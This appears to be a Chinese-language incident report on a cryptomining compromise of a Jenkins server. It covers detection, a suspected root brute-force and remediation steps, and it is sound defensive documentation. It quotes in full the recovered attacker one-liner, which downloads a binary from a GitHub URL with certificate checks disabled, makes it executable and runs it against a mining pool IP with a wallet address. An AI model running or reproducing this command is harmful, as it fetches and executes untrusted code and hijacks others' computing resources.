- 问题发现
- 2022-4-7 14:05:00 腾讯云报警CPU100%。
- 问题处理
- 2022-4-7 14:08:00 查找高CPU进程,发现是Jenkins上有一个服务正在消耗CPU。而且该服务无法停止,只能进行删除。CPU回归正常。
- 原因查找
腾讯云监控显示:2022-4-7 00:45:00——2022-4-7 14:19:00时间段内CPU占用100%。
1)、查找登录日志发现有异常,疑似暴力破解root密码。
2)、无法查找2022-4-7 00:45:00左右访问Jenkins的名单。
3)、查找删除的服务遗留文件,发现有脚本残留,脚本如下。在github上下载该脚本,在对其放开运行权限,进行挖矿。GitHub上这个账号代码仓库里都是通过Jenkins破解的,截图如下。
curl -L --insecure --connect-timeout 5 --max-time 40 --fail http://raw.githubusercontent.com/anw1012/yw/main/xxxx -o xxxx 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 http://raw.githubusercontent.com/anw1012/yw/main/xxxx -O xxxx 2> /dev/null || _curl http://raw.githubusercontent.com/anw1012/yw/main/xxxx > xxxx chmod 777 * ./xxxx -a yespower -o stratum+tcps://51.79.177.216:17017 -u web1q7qdp8wlhpkd0p05md9eqjpp4z89nd5rx2djdwm.B77PLin; |
4、问题解决
1)、对暴力破解root密码的IP进行拦截。
2)、Jenkins密码更改。
3)、Jenkins升级到最新版本。2.292.0升级到:2.332.2
4)、删除Jenkins无用的插件和更新插件。
5)、删除矿机程序。
6)、检查是否有恶意定时任务,检测到一个,进行删除。
5、参考文章